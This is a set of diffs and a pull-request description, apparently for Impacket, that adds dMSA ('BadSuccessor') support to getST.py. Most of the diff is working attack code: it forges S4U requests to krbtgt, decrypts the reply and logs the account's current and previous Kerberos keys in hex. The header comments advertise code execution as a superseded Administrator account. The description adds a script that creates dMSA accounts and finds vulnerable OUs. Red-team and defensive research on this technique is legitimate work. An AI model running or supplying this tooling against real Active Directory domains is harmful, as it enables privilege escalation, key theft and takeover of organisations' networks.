+        if self.__dmsa:
+            nonce_value = random.getrandbits(31)
+            dmsa_flags = [2, 4] # UNCONDITIONAL_DELEGATION (bit 2) | SIGN_REPLY (bit 4)
+            encoded_flags = encodeFlags(dmsa_flags)
+            
+            s4uID = S4UUserID()
+            s4uID.setComponentByName('nonce', nonce_value)
+            seq_set(s4uID, 'cname', clientName.components_to_asn1)
+            s4uID.setComponentByName('crealm', self.__domain) 
+            s4uID.setComponentByName('options', encoded_flags)
 
-        # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
-        # with the following three parameters: the session key of the TGT of
-        # the service performing the S4U2Self request, the message type value
-        # of 17, and the byte array S4UByteArray.
-        checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
+            encoded_s4uid = encoder.encode(s4uID)
+            checksum_profile = _get_checksum_profile(Cksumtype.SHA1_AES256)
+            checkSum = checksum_profile.checksum(
+                sessionKey, 
+                ApplicationTagNumbers.EncTGSRepPart.value,
+                encoded_s4uid
+            )
+            if logging.getLogger().level == logging.DEBUG:
+                logging.debug('CheckSum')
+                hexdump(checkSum)
+            s4uID_tagged = S4UUserID().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))
+            s4uID_tagged.setComponentByName('nonce', nonce_value)
+            seq_set(s4uID_tagged, 'cname', clientName.components_to_asn1)
+            s4uID_tagged.setComponentByName('crealm', self.__domain) 
+            s4uID_tagged.setComponentByName('options', encoded_flags)
 
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('CheckSum')
-            hexdump(checkSum)
+            pa_s4u_x509_user = PA_S4U_X509_USER()
+            pa_s4u_x509_user.setComponentByName('user-id', s4uID_tagged)
+            pa_s4u_x509_user['checksum'] = noValue
+            pa_s4u_x509_user['checksum']['cksumtype'] = Cksumtype.SHA1_AES256
+            pa_s4u_x509_user['checksum']['checksum'] = checkSum
 
-        paForUserEnc = PA_FOR_USER_ENC()
-        seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
-        paForUserEnc['userRealm'] = self.__domain
-        paForUserEnc['cksum'] = noValue
-        paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
-        paForUserEnc['cksum']['checksum'] = checkSum
-        paForUserEnc['auth-package'] = 'Kerberos'
+            if logging.getLogger().level == logging.DEBUG:
+                logging.debug('Built PA_S4U_X509_USER for DMSA:')
+                print(pa_s4u_x509_user.prettyPrint())
 
-        if logging.getLogger().level == logging.DEBUG:
-            logging.debug('PA_FOR_USER_ENC')
-            print(paForUserEnc.prettyPrint())
+            padatatype = int(constants.PreAuthenticationDataTypes.PA_S4U_X509_USER.value)
+            paencoded = encoder.encode(pa_s4u_x509_user)
+        else:
+            # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
+            # with the following three parameters: the session key of the TGT of
+            # the service performing the S4U2Self request, the message type value
+            # of 17, and the byte array S4UByteArray.
+            checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
 
-        encodedPaForUserEnc = encoder.encode(paForUserEnc)
+            if logging.getLogger().level == logging.DEBUG:
+                logging.debug('CheckSum')
+                hexdump(checkSum)
+
+            paForUserEnc = PA_FOR_USER_ENC()
+            seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
+            paForUserEnc['userRealm'] = self.__domain
+            paForUserEnc['cksum'] = noValue
+            paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
+            paForUserEnc['cksum']['checksum'] = checkSum
+            paForUserEnc['auth-package'] = 'Kerberos'
+
+            if logging.getLogger().level == logging.DEBUG:
+                logging.debug('PA_FOR_USER_ENC')
+                print(paForUserEnc.prettyPrint())
+
+            encodedPaForUserEnc = encoder.encode(paForUserEnc)
+            padatatype = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
+            paencoded = encodedPaForUserEnc
 
         tgsReq['padata'][1] = noValue
-        tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
-        tgsReq['padata'][1]['padata-value'] = encodedPaForUserEnc
+        tgsReq['padata'][1]['padata-type'] = padatatype
+        tgsReq['padata'][1]['padata-value'] = paencoded
 
         reqBody = seq_set(tgsReq, 'req-body')
 
@@ -466,8 +517,12 @@ class GETST:
 
         if self.__no_s4u2proxy and self.__options.spn is not None:
             logging.info("When doing S4U2self only, argument -spn is ignored")
-        if self.__options.u2u:
-            serverName = Principal(self.__user, self.__domain, type=constants.PrincipalNameType.NT_UNKNOWN.value)
+
+        if self.__dmsa:
+            serverName = Principal('krbtgt/%s' % self.__domain, type=constants.PrincipalNameType.NT_SRV_INST.value)
+            logging.debug('DMSA: Targeting krbtgt/%s service (sname)' % self.__domain)            
+        elif self.__options.u2u:
+            serverName = Principal(self.__user, self.__domain.upper(), type=constants.PrincipalNameType.NT_UNKNOWN.value)
         else:
             serverName = Principal(self.__user, type=constants.PrincipalNameType.NT_UNKNOWN.value)
 
@@ -494,6 +549,53 @@ class GETST:
         r = sendReceive(message, self.__domain, kdcHost)
 
         tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        if self.__dmsa:
+            try:
+                # Decrypt TGS-REP enc-part (Key Usage 8 - TGS_REP_EP_SESSION_KEY)
+                cipher = _enctype_table[int(tgs['enc-part']['etype'])]
+                plainText = cipher.decrypt(sessionKey, 8, tgs['enc-part']['cipher'])
+                encTgsRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
+                
+                if logging.getLogger().level == logging.DEBUG:
+                    print(encTgsRepPart.prettyPrint())
+                
+                if 'encrypted_pa_data' not in encTgsRepPart or not encTgsRepPart['encrypted_pa_data']:
+                    logging.debug('No encrypted_pa_data found - DMSA key package not present')
+                    return
+                    
+                logging.debug('Found encrypted_pa_data, searching for DMSA key package...')
+                
+                for padata_entry in encTgsRepPart['encrypted_pa_data']:
+                    padata_type = int(padata_entry['padata-type'])
+                    logging.debug('Found encrypted padata type: %d (0x%x)' % (padata_type, padata_type))
+                    
+                    if padata_type == constants.PreAuthenticationDataTypes.PA_DMSA_KEY_PACKAGE.value:
+                        dmsa_key_package = decoder.decode(
+                            padata_entry['padata-value'], 
+                            asn1Spec=PA_DMSA_KEY_PACKAGE()
+                        )[0]
+                        dmsa_key_package.prettyPrint()
+                       
+                        logging.info('Current keys:')
+                        for key in dmsa_key_package['current-keys']:
+                            key_type = int(key['keytype'])
+                            key_value = bytes(key['keyvalue'])
+                            type_name = constants.EncryptionTypes(key_type)
+                            hex_key = hexlify(key_value).decode('utf-8')
+                            logging.info('%s:%s' % (type_name, hex_key))
+                        logging.info('Previous keys:')
+                        for key in dmsa_key_package['previous-keys']:
+                            key_type = int(key['keytype'])
+                            key_value = bytes(key['keyvalue'])
+                            type_name = constants.EncryptionTypes(key_type)
+                            hex_key = hexlify(key_value).decode('utf-8')
+                            logging.info('%s:%s' % (type_name, hex_key))
+            
+            except Exception as e:
+                if logging.getLogger().level == logging.DEBUG:
+                    import traceback
+                    traceback.print_exc()
 
         if self.__no_s4u2proxy:
             return r, None, sessionKey, None
@@ -741,6 +843,7 @@ if __name__ == '__main__':
     parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the '
                                                      'service ticket will' ' be generated for')
     parser.add_argument('-altservice', action="store", help='New sname/SPN to set in the ticket')
+    parser.add_argument('-dmsa', action='store_true', help='Use DMSA (Delegated Managed Service Accounts) ')
     parser.add_argument('-impersonate', action="store", help='target username that will be impersonated (thru S4U2Self)'
                                                              ' for quering the ST. Keep in mind this will only work if '
                                                              'the identity provided in this scripts is allowed for '

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -31,8 +31,10 @@
 #
 #   The output of this script will be a service ticket for the Administrator user.
 #
-#   Implemented by @fulc2um: you can request a ticket for dMSA account and use it for code execution with privileges of superceded user.
-#   Assume that dMSA account dmsa$ is dMSA account and Administrator is superceded account:
+#   Implemented by @fulc2um: you can request a ticket for dMSA account and use it for code execution with privileges of superseded user.
+#   Microsoft documentation for setting up Delegated Managed Service Accounts (dMSA): 
+#   https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/delegated-managed-service-accounts/delegated-managed-service-accounts-set-up-dmsa
+#   Assume that dMSA account dmsa$ is dMSA account and Administrator is superseded account:
 #         ./getST.py -k -no-pass -impersonate dmsa$ -self -dmsa contoso.com/user
 #
 #   Once you have the ccache file, set it in the KRB5CCNAME variable and use it for fun and profit.

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -70,7 +70,7 @@ from impacket.examples import logger
 from impacket.examples.utils import parse_identity
 from impacket.krb5 import constants, types, crypto, ccache
 from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
-    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart, S4UUserID, PA_S4U_X509_USER, PA_DMSA_KEY_PACKAGE
+    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart, S4UUserID, PA_S4U_X509_USER, KRB_DMSA_KEY_PACKAGE
 from impacket.krb5.ccache import CCache, Credential
 from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype, string_to_key, _get_checksum_profile, Cksumtype
 from impacket.krb5.constants import TicketFlags, encodeFlags, ApplicationTagNumbers
@@ -575,7 +575,7 @@ class GETST:
                     if padata_type == constants.PreAuthenticationDataTypes.PA_DMSA_KEY_PACKAGE.value:
                         dmsa_key_package = decoder.decode(
                             padata_entry['padata-value'], 
-                            asn1Spec=PA_DMSA_KEY_PACKAGE()
+                            asn1Spec=KRB_DMSA_KEY_PACKAGE()
                         )[0]
                         dmsa_key_package.prettyPrint()
                        

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -572,7 +572,7 @@ class GETST:
                     padata_type = int(padata_entry['padata-type'])
                     logging.debug('Found encrypted padata type: %d (0x%x)' % (padata_type, padata_type))
                     
-                    if padata_type == constants.PreAuthenticationDataTypes.PA_DMSA_KEY_PACKAGE.value:
+                    if padata_type == constants.PreAuthenticationDataTypes.KERB_DMSA_KEY_PACKAGE.value:
                         dmsa_key_package = decoder.decode(
                             padata_entry['padata-value'], 
                             asn1Spec=KERB_DMSA_KEY_PACKAGE()

--- a/examples/getST.py
+++ b/examples/getST.py
@@ -70,7 +70,7 @@ from impacket.examples import logger
 from impacket.examples.utils import parse_identity
 from impacket.krb5 import constants, types, crypto, ccache
 from impacket.krb5.asn1 import AP_REQ, AS_REP, TGS_REQ, Authenticator, TGS_REP, seq_set, seq_set_iter, PA_FOR_USER_ENC, \
-    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart, S4UUserID, PA_S4U_X509_USER, KRB_DMSA_KEY_PACKAGE
+    Ticket as TicketAsn1, EncTGSRepPart, PA_PAC_OPTIONS, EncTicketPart, S4UUserID, PA_S4U_X509_USER, KERB_DMSA_KEY_PACKAGE
 from impacket.krb5.ccache import CCache, Credential
 from impacket.krb5.crypto import Key, _enctype_table, _HMACMD5, _AES256CTS, Enctype, string_to_key, _get_checksum_profile, Cksumtype
 from impacket.krb5.constants import TicketFlags, encodeFlags, ApplicationTagNumbers
@@ -575,7 +575,7 @@ class GETST:
                     if padata_type == constants.PreAuthenticationDataTypes.PA_DMSA_KEY_PACKAGE.value:
                         dmsa_key_package = decoder.decode(
                             padata_entry['padata-value'], 
-                            asn1Spec=KRB_DMSA_KEY_PACKAGE()
+                            asn1Spec=KERB_DMSA_KEY_PACKAGE()
                         )[0]
                         dmsa_key_package.prettyPrint()
                        

--- a/impacket/krb5/asn1.py
+++ b/impacket/krb5/asn1.py
@@ -540,7 +540,7 @@ class PA_S4U_X509_USER(univ.Sequence):
         namedtype.NamedType('user-id', S4UUserID().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
         namedtype.NamedType('checksum', Checksum().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))))
     
-class PA_DMSA_KEY_PACKAGE(univ.Sequence):
+class KRB_DMSA_KEY_PACKAGE(univ.Sequence):
     componentType = namedtype.NamedTypes(
         _sequence_component("current-keys", 0, univ.SequenceOf(componentType=EncryptionKey())),
         _sequence_optional_component("previous-keys", 1, univ.SequenceOf(componentType=EncryptionKey())),

--- a/impacket/krb5/asn1.py
+++ b/impacket/krb5/asn1.py
@@ -519,3 +519,32 @@ class KERB_KEY_LIST_REQ(univ.SequenceOf):
 
 class KERB_KEY_LIST_REP(univ.SequenceOf):
     componentType = EncryptionKey()
+
+class KERB_SUPERSEDED_BY_USER(univ.Sequence):
+    componentType = namedtype.NamedTypes(
+        _sequence_component('name', 0, PrincipalName()),
+        _sequence_optional_component('userRealm', 1, Realm()),
+    )
+
+class S4UUserID(univ.Sequence):
+    componentType = namedtype.NamedTypes(
+        _sequence_component('nonce', 0,  UInt32()),
+        _sequence_component('cname', 1, PrincipalName()),
+        _sequence_optional_component('crealm', 2, Realm()),
+        _sequence_optional_component('subject-certificate', 3, univ.OctetString()),
+        _sequence_optional_component('options', 4, KerberosFlags())
+    )
+
+class PA_S4U_X509_USER(univ.Sequence):
+    componentType = namedtype.NamedTypes(
+        namedtype.NamedType('user-id', S4UUserID().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
+        namedtype.NamedType('checksum', Checksum().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))))
+    
+class PA_DMSA_KEY_PACKAGE(univ.Sequence):
+    componentType = namedtype.NamedTypes(
+        _sequence_component("current-keys", 0, univ.SequenceOf(componentType=EncryptionKey())),
+        _sequence_optional_component("previous-keys", 1, univ.SequenceOf(componentType=EncryptionKey())),
+        _sequence_component("effective-time", 2, KerberosTime()),
+        _sequence_optional_component("reserved", 3, univ.OctetString()),
+        _sequence_component("expiration-time", 4, KerberosTime())
+        )

--- a/impacket/krb5/asn1.py
+++ b/impacket/krb5/asn1.py
@@ -540,7 +540,7 @@ class PA_S4U_X509_USER(univ.Sequence):
         namedtype.NamedType('user-id', S4UUserID().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
         namedtype.NamedType('checksum', Checksum().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))))
     
-class KRB_DMSA_KEY_PACKAGE(univ.Sequence):
+class KERB_DMSA_KEY_PACKAGE(univ.Sequence):
     componentType = namedtype.NamedTypes(
         _sequence_component("current-keys", 0, univ.SequenceOf(componentType=EncryptionKey())),
         _sequence_optional_component("previous-keys", 1, univ.SequenceOf(componentType=EncryptionKey())),

--- a/impacket/krb5/constants.py
+++ b/impacket/krb5/constants.py
@@ -114,7 +114,7 @@ class PreAuthenticationDataTypes(Enum):
     PA_SUPPORTED_ENCTYPES      = 165
     PA_PAC_OPTIONS             = 167
     KERB_SUPERSEDED_BY_USER    = 170
-    PA_DMSA_KEY_PACKAGE        = 171
+    KERB_DMSA_KEY_PACKAGE      = 171
 
 class AddressType(Enum):
     IPv4            = 2

--- a/impacket/krb5/constants.py
+++ b/impacket/krb5/constants.py
@@ -104,6 +104,7 @@ class PreAuthenticationDataTypes(Enum):
     TD_REQ_SEQ                 = 108
     PA_PAC_REQUEST             = 128
     PA_FOR_USER                = 129
+    PA_S4U_X509_USER           = 130
     PA_FX_COOKIE               = 133 
     PA_FX_FAST                 = 136
     PA_FX_ERROR                = 137
@@ -112,6 +113,8 @@ class PreAuthenticationDataTypes(Enum):
     KERB_KEY_LIST_REP          = 162
     PA_SUPPORTED_ENCTYPES      = 165
     PA_PAC_OPTIONS             = 167
+    KERB_SUPERSEDED_BY_USER    = 170
+    PA_DMSA_KEY_PACKAGE        = 171
 
 class AddressType(Enum):
     IPv4            = 2


### PR DESCRIPTION
Added badsuccessor.py example based on the AKAMAI research (https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory)

- Added badsuccessor.py script to examples. With this script it is possible to add/delete dMSA accounts. It is also possible to search for vulnerable OUs based on (https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1)
- Modified getST.py to support -dmsa flag
- Modified krb5/asn1.py and krb5/constants.py to provide KERB-DMSA-KEY-PACKAGE and PA_S4U_X509_USER

Examples:
Low privileged user info:

<img width="474" height="400" alt="Screenshot 2025-07-28 at 10 33 32 AM" src="https://github.com/user-attachments/assets/d4f35ae2-ab30-4031-abf7-80042f7c967f" />

**Search:**
<img width="708" height="181" alt="Screenshot 2025-07-28 at 10 12 34 AM" src="https://github.com/user-attachments/assets/0527ec2a-744f-4676-9fde-951719893a44" />

**Add:**
<img width="754" height="179" alt="Screenshot 2025-07-28 at 10 15 12 AM" src="https://github.com/user-attachments/assets/4fdd9df1-7dfe-4944-b915-830137e89a4b" />

**Delete:**
<img width="751" height="147" alt="Screenshot 2025-07-28 at 10 15 44 AM" src="https://github.com/user-attachments/assets/f17cf5f5-184d-4f15-8dd7-459daa1b45c9" />

**Modify:**
<img width="917" height="80" alt="Screenshot 2025-08-08 at 11 50 40 AM" src="https://github.com/user-attachments/assets/e3e51fb3-5d97-468a-bbf6-a577fb53c168" />

**Ticket request and code execution:**
<img width="677" height="204" alt="Screenshot 2025-07-28 at 10 18 09 AM" src="https://github.com/user-attachments/assets/1cb9689f-7ab9-4d69-a5a6-bdbbb8f0f649" />


<img width="751" height="145" alt="Screenshot 2025-07-28 at 10 18 45 AM" src="https://github.com/user-attachments/assets/85fc39d8-9d7e-4210-a967-eb4c882a544b" />
